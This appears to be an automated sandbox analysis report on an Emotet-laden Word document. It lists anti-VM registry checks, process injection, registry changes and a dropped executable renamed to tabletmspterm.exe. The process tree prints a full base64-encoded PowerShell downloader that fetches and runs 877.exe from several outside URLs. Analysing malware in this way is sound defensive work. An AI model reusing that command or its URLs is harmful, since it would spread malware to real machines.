Task
task1
Sample
Docs_8284e996aea8e5075256c03a93eaa6df.7.doc
Resource
win7
0 signatures
Task
task2
Sample
Docs_8284e996aea8e5075256c03a93eaa6df.7.doc
Resource
win10
0 signatures
General
-
Target
Docs_8284e996aea8e5075256c03a93eaa6df.7
-
Sample
191011-dzk22491aa
-
SHA256
9e1d7cd63b0edcb4b3c4b1c86ecf477245ba82b4291bf26484fe2dd6cd9d12a1
Score
N/A
Malware Config
Signatures
-
Suspicious behavior: AddClipboardFormatListener
-
Suspicious use of SetWindowsHookEx
-
Processes:
WINWORD.EXEat description ioc Process 28828 File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm WINWORD.EXE 28953 File created C:\Users\Admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm WINWORD.EXE 29563 File opened for modification C:\Users\Admin\AppData\Local\Temp\Docs_8284e996aea8e5075256c03a93eaa6df.7.doc WINWORD.EXE 29703 File created C:\Users\Admin\AppData\Local\Temp\~$cs_8284e996aea8e5075256c03a93eaa6df.7.doc WINWORD.EXE -
Checks system information in the registry (likely anti-VM) 2 TTPs 2 IoCs
Processes:
WINWORD.EXEat description ioc Process 29344 Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer WINWORD.EXE 29344 Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName WINWORD.EXE -
Enumerates system info in registry 2 TTPs 5 IoCs
Processes:
WINWORD.EXEat description ioc Process 29344 Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE 29344 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE 29359 Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE 29359 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE 29359 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Checks processor information in registry (likely anti-VM) 2 TTPs 2 IoCs
Processes:
WINWORD.EXEat description ioc Process 29344 Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE 29344 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE -
Suspicious use of FindShellTrayWindow
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exeat description Process 35813 Token: SeDebugPrivilege powershell.exe -
Suspicious behavior: EnumeratesProcesses
-
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
SppExtComObj.exepowershell.exe877.exetabletmspterm.exeat description Process procid_target 41906 PID 3084 wrote to memory of 3404 SppExtComObj.exe 44 45563 PID 4064 wrote to memory of 3296 powershell.exe 46 45859 PID 3296 wrote to memory of 2860 877.exe 47 51656 PID 2460 wrote to memory of 780 tabletmspterm.exe 49 -
Modifies registry class 1 TTPs 84 IoCs
Processes:
877.exe877.exetabletmspterm.exeat description ioc Process 45750 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1 877.exe 45750 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\ = "Recalc Document" 877.exe 45750 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\DefaultIcon 877.exe 45750 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\DefaultIcon\ = "C:\\Users\\Admin\\877.exe,0" 877.exe 45750 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\ddeexec 877.exe 45750 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell 877.exe 45750 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open 877.exe 45750 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\ddeexec\ = "[open(\"%1\")]" 877.exe 45750 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\ddeexec 877.exe 45750 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print 877.exe 45750 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\ddeexec\ = "[print(\"%1\")]" 877.exe 45750 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\ddeexec 877.exe 45750 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto 877.exe 45750 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\ddeexec\ = "[printto(\"%1\",\"%2\",\"%3\",\"%4\")]" 877.exe 45750 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\command 877.exe 45750 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\command\ = "C:\\Users\\Admin\\877.exe /dde" 877.exe 45750 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\command 877.exe 45750 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\command\ = "C:\\Users\\Admin\\877.exe /dde" 877.exe 45750 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\command 877.exe 45750 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\command\ = "C:\\Users\\Admin\\877.exe /dde" 877.exe 45766 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.RCL 877.exe 45766 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ = "Recalc.Document.1" 877.exe 45766 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ShellNew 877.exe 45766 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ShellNew\NullFile 877.exe 45984 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1 877.exe 45984 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\ = "Recalc Document" 877.exe 45984 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\DefaultIcon 877.exe 45984 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\DefaultIcon\ = "C:\\Users\\Admin\\877.exe,0" 877.exe 45984 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\ddeexec 877.exe 45984 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\ddeexec\ = "[open(\"%1\")]" 877.exe 45984 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\ddeexec 877.exe 45984 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\ddeexec\ = "[print(\"%1\")]" 877.exe 45984 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\ddeexec 877.exe 45984 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\ddeexec\ = "[printto(\"%1\",\"%2\",\"%3\",\"%4\")]" 877.exe 45984 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\command 877.exe 45984 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\command\ = "C:\\Users\\Admin\\877.exe /dde" 877.exe 45984 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\command 877.exe 45984 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\command\ = "C:\\Users\\Admin\\877.exe /dde" 877.exe 45984 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\command 877.exe 45984 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\command\ = "C:\\Users\\Admin\\877.exe /dde" 877.exe 45984 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.RCL 877.exe 45984 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ = "Recalc.Document.1" 877.exe 45984 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ShellNew 877.exe 45984 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ShellNew\NullFile 877.exe 51500 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1 tabletmspterm.exe 51500 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\ = "Recalc Document" tabletmspterm.exe 51500 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\DefaultIcon tabletmspterm.exe 51500 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\DefaultIcon\ = "C:\\Windows\\SysWOW64\\TABLET~1.EXE,0" tabletmspterm.exe 51500 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\ddeexec tabletmspterm.exe 51500 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\ddeexec\ = "[open(\"%1\")]" tabletmspterm.exe 51500 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\ddeexec tabletmspterm.exe 51500 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\ddeexec\ = "[print(\"%1\")]" tabletmspterm.exe 51500 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\ddeexec tabletmspterm.exe 51500 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\ddeexec\ = "[printto(\"%1\",\"%2\",\"%3\",\"%4\")]" tabletmspterm.exe 51500 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\command tabletmspterm.exe 51500 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\command\ = "C:\\Windows\\SysWOW64\\TABLET~1.EXE /dde" tabletmspterm.exe 51500 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\command tabletmspterm.exe 51500 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\command\ = "C:\\Windows\\SysWOW64\\TABLET~1.EXE /dde" tabletmspterm.exe 51500 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\command tabletmspterm.exe 51500 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\command\ = "C:\\Windows\\SysWOW64\\TABLET~1.EXE /dde" tabletmspterm.exe 51500 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.RCL tabletmspterm.exe 51500 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ = "Recalc.Document.1" tabletmspterm.exe 51500 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ShellNew tabletmspterm.exe 51500 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ShellNew\NullFile tabletmspterm.exe 51703 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1 tabletmspterm.exe 51703 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\ = "Recalc Document" tabletmspterm.exe 51719 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\DefaultIcon tabletmspterm.exe 51719 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\DefaultIcon\ = "C:\\Windows\\SysWOW64\\TABLET~1.EXE,0" tabletmspterm.exe 51719 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\ddeexec tabletmspterm.exe 51719 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\ddeexec\ = "[open(\"%1\")]" tabletmspterm.exe 51719 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\ddeexec tabletmspterm.exe 51719 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\ddeexec\ = "[print(\"%1\")]" tabletmspterm.exe 51719 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\ddeexec tabletmspterm.exe 51719 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\ddeexec\ = "[printto(\"%1\",\"%2\",\"%3\",\"%4\")]" tabletmspterm.exe 51719 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\command tabletmspterm.exe 51719 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\command\ = "C:\\Windows\\SysWOW64\\TABLET~1.EXE /dde" tabletmspterm.exe 51719 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\command tabletmspterm.exe 51719 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\command\ = "C:\\Windows\\SysWOW64\\TABLET~1.EXE /dde" tabletmspterm.exe 51719 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\command tabletmspterm.exe 51719 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\command\ = "C:\\Windows\\SysWOW64\\TABLET~1.EXE /dde" tabletmspterm.exe 51719 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.RCL tabletmspterm.exe 51719 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ = "Recalc.Document.1" tabletmspterm.exe 51719 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ShellNew tabletmspterm.exe 51719 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ShellNew\NullFile tabletmspterm.exe -
Processes:
877.exedescription ioc Process Event created Global\E145925EC 877.exe -
Suspicious behavior: EmotetMutantsSpam
-
Drops file in system dir 6 IoCs
Processes:
877.exetabletmspterm.exeat description ioc Process 50344 File renamed C:\Users\Admin\877.exe => C:\Windows\SysWOW64\tabletmspterm.exe 877.exe 73813 File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat tabletmspterm.exe 73938 File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 tabletmspterm.exe 73938 File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE tabletmspterm.exe 73938 File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies tabletmspterm.exe 73938 File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 tabletmspterm.exe -
emotet family
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_8284e996aea8e5075256c03a93eaa6df.7.doc" /o ""1⤵
- Drops Office document
- Checks system information in the registry (likely anti-VM)
- Enumerates system info in registry
- Checks processor information in registry (likely anti-VM)
PID:3592
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABiADAAOQAwADUAMAAyADAAYwA5ADAAYwA1AD0AJwBiADgAMQAzADcANgAzADQAMwA5AGMAMABjACcAOwAkAGIAeAAyADQANwAwADQANgAwADUAMgAgAD0AIAAnADgANwA3ACcAOwAkAHgAOQAwADEAeAA0ADMAMQAyADMANQAzAD0AJwB4AGIAYwA5ADEAMgAyADAANAAzAHgAJwA7ACQAYgA0ADgAMAA3ADkAMAA3ADAAYgAxADkAMgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYgB4ADIANAA3ADAANAA2ADAANQAyACsAJwAuAGUAeABlACcAOwAkAHgAMwBjAGIAMAA0ADIAOQA1ADcANgA4AD0AJwBjAHgAMQB4AHgAeAB4ADYAYgA4ADUAJwA7ACQAYwA0ADQAMgA5ADAAMgAwADIAeAB4ADAANAA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwBiAGoAZQBjACcAKwAnAHQAJwApACAAbgBFAFQALgB3AEUAYgBDAGwAaQBFAE4AVAA7ACQAYgBjADMAMwAwADEAOAAwAGMAMAA4AD0AJwBoAHQAdABwAHMAOgAvAC8AdABoAGUAcwBpAGwAdgBlAHIAYQBuAHQALgBjAG8AbQAvAHQAZQBzAHQALwBkAHYAcgA5AC8AKgBoAHQAdABwADoALwAvAGYAaQByAHMAdABtAG4AZAAuAGMAbwBtAC8AdwBwAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvADMAawA5ADYAMAAvACoAaAB0AHQAcAA6AC8ALwBjAGkAdAB5AGwAYQBuAGQAZwBvAHYAYQBwAC4AbgBlAHQALwA4AGQAcQBzADUAZgB2AC8ANgBKAC8AKgBoAHQAdABwADoALwAvAGQAZQByAGUAZABpAGEALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwBjAGIAYQBzAC8AKgBoAHQAdABwADoALwAvAGYAYQB0AHQAbwByAGkAYQBpAHAAbwBuAHQAaQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AbwAxAHcAaQBFAHEAUABmAE4ALwAnAC4AIgBTAHAAYABsAGkAdAAiACgAJwAqACcAKQA7ACQAeAAzADMANgBjADUAMAAxADAAYgAyADcAPQAnAGIAOQA2ADcAYgAxAHgAMgAwADEAMgAnADsAZgBvAHIAZQBhAGMAaAAoACQAeAAzADcANQAwADAAOAAxADAAMAA1ADcAYwAgAGkAbgAgACQAYgBjADMAMwAwADEAOAAwAGMAMAA4ACkAewB0AHIAeQB7ACQAYwA0ADQAMgA5ADAAMgAwADIAeAB4ADAANAAuACIAZABPAFcAbgBMAGAATwBhAGQAZgBgAEkATABFACIAKAAkAHgAMwA3ADUAMAAwADgAMQAwADAANQA3AGMALAAgACQAYgA0ADgAMAA3ADkAMAA3ADAAYgAxADkAMgApADsAJABiADYAMgA2ADgAMQB4AGMAMwBjAHgANAA9ACcAeABiADAAMAA1AGIAMAA1ADAANgB4ADMANQAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0ACcAKwAnAC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAGIANAA4ADAANwA5ADAANwAwAGIAMQA5ADIAKQAuACIATABlAGAATgBHAHQAaAAiACAALQBnAGUAIAAyADcAOQAxADgAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwB0AEEAYABSAHQAIgAoACQAYgA0ADgAMAA3ADkAMAA3ADAAYgAxADkAMgApADsAJAB4ADIAYgAwADcAOAA3ADcAOAA0ADAAMAA9ACcAYgAxADAAMgAwADEAMAAxADAAMAA2ADAAJwA7AGIAcgBlAGEAawA7ACQAYgAyADAAOAAyADAAeAAwADIAYwAzADMANQA9ACcAeAAxAHgAMQAxAHgAMAA0AGMANQA4ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGIAYwA1ADkAMAAwAGIAMwA4ADEAOAAyADcAPQAnAGMAMAA3ADkAOAAwADkAOQA2ADgANgA4ADkAJwA=1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4064
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
- Suspicious use of WriteProcessMemory
PID:3084
-
C:\Windows\System32\SLUI.exe"C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent1⤵PID:3404
-
C:\Users\Admin\877.exe"C:\Users\Admin\877.exe"1⤵
- Suspicious use of WriteProcessMemory
- Modifies registry class
PID:3296
-
C:\Users\Admin\877.exe--406b05561⤵
- Modifies registry class
- Emotet Sync
- Drops file in system dir
PID:2860
-
C:\Windows\SysWOW64\tabletmspterm.exe"C:\Windows\SysWOW64\tabletmspterm.exe"1⤵
- Suspicious use of WriteProcessMemory
- Modifies registry class
PID:2460
-
C:\Windows\SysWOW64\tabletmspterm.exe--356fff061⤵
- Drops file in system dir
PID:780